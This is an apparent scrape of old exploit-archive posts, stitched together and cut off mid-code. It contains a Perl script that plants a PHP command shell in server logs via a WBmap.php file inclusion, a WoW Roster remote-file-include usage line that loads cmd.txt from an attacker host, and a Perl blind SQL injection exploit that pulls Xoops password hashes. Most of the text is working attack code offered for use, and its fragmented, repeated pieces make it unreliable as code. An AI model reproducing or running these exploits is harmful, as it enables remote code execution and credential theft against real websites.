$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect. Exiting \r\n"; print $sock "GET ".$folder."include/WBmap.php?l=".$path."%00 HTTP/1.1\n"; print $sock "Host: $target\n"; print $sock "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n"; print $sock "Accept: text/html\n"; print $sock "Connection: close\n\n\r\n"; #locate log file part taken from Kacper's http://www.milw0rm.com/exploits/2253 $out = ""; while ($answer = <$sock>) { $out.=$answer; } close($sock); if ($out =~ m/_exppl_(.*?)_exppl_/ms) { print "[+] Log file found! [".$path."] \n"; $log = $path; } } if ($log eq "") { print "[-] Log file not found. Exiting \n"; exit(); } print "[+] Inserting PHP Shell into logs\n"; $code = "<?php ob_clean(); echo ".$cmdfunct."(\$_GET['cmd']); die(); ?>"; $xpl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect. Exiting \r\n"; print $xpl "GET /".$code." HTTP/1.1\n"; print $xpl "Host: $target\n"; print $xpl "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n"; print $xpl "Accept: text/html\n"; print $xpl "Connection: close\n\n\r\n"; print "[+] Sent code \n"; print "[!] Command execution at: ".$target.$folder."include/WBmap.php?l=".$log."%00"; # milw0rm.com [2006-12-01] Black_hat_cr(HCE) WoW Roster <= 1.70 (/lib/phpbb.php) Remote File Include Vulnerability Code: Title : WoW Roster (/lib/phpbb.php) Remote File Include Vulnerability Affected software description : Application : World of Warcraft (WoW) Roster URL : http://www.wowroster.net/ dork : "wow roster version 1.*" Exploit : Usage: http://[target]/[roster_path]/lib/phpbb.php?subdir=http://[evilhost]/cmd.txt?&cmd= ls greets: XLR, rdy, wiggle, phreek, menx [ ] special greet: my old gf ;) Contact: Nick: |peti on irc.quakenet.org/irc.efnet.net [ eof ] # milw0rm.com [2006-08-02] vns3curity(HCE) x00ps Portal - Exploit Xoops <= 2.0.11 xmlrpc.php SQL Injection Exploit Code: #!/usr/bin/perl ## Xoops <= 2.0.11 xmlrpc.php sql injection exploit by RST/GHC ## based on http://www.gulftech.org/?node=research&article_id=00086-06292005 ## coded by 1dt.w0lf ## RST/GHC ## http://rst.void.ru ## http://ghc.ru ## example: ## r57xoops.pl -u http://www.xoops2.ru/xmlrpc.php -n Alexxus ## ## Xoops <= 2.0.11 xmlrpc.php sql injection exploit by RST/GHC ## ## [~] URL : http://www.xoops2.ru/xmlrpc.php ## [~] NAME : Alexxus ## [~] SEARCHING PASSWORD [ DONE ] ## ## USER NAME : Alexxus ## USER HASH : a26c7baaa40ab863f9b22c8649427fa6 ## use LWP::UserAgent; use Getopt::Std; getopts('u:n:'); $url = $opt_u; $name = $opt_n; if(!$url || !$name) { &usage; } $s_num = 1; $|++; $n = 0; &head; print "\r\n"; print " [~] URL : $url\r\n"; print " [~] NAME : $name\r\n"; print " [~] SEARCHING PASSWORD [|]"; while(1) { if(&found(47,58)==0) { &found(96,103); } $char = $i; if ($char=="0") { if(length($allchar) > 0){ print qq{\b\b DONE ] USER NAME : $name USER HASH : $allchar }; } else { print "\b\b FAILED ]"; } exit(); } else { $allchar .= chr($char); } $s_num++; } sub found($$) { my $fmin = $_[0]; my $fmax = $_[1]; if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; } $r = int($fmax - ($fmax-$fmin)/2); $check = "/**/BETWEEN/**/$r/**/AND/**/$fmax"; if ( &check($check) ) { &found($r,$fmax); } else { &found($fmin,$r); } } sub crack($$) { my $cmin = $_[0]; my $cmax = $_[1]; $i = $cmin; while ($i<$cmax) { $crcheck = "=$i"; if ( &check($crcheck) ) { return $i; } $i++; } $i = 0; return $i; } sub check($) { $n++; status(); $ccheck = $_[0]; . "Accept: text/html "; print $sock "Connection: close "; #locate log file part taken from Kacper's http://www.milw0rm.com/exploits/2253 $out = ""; while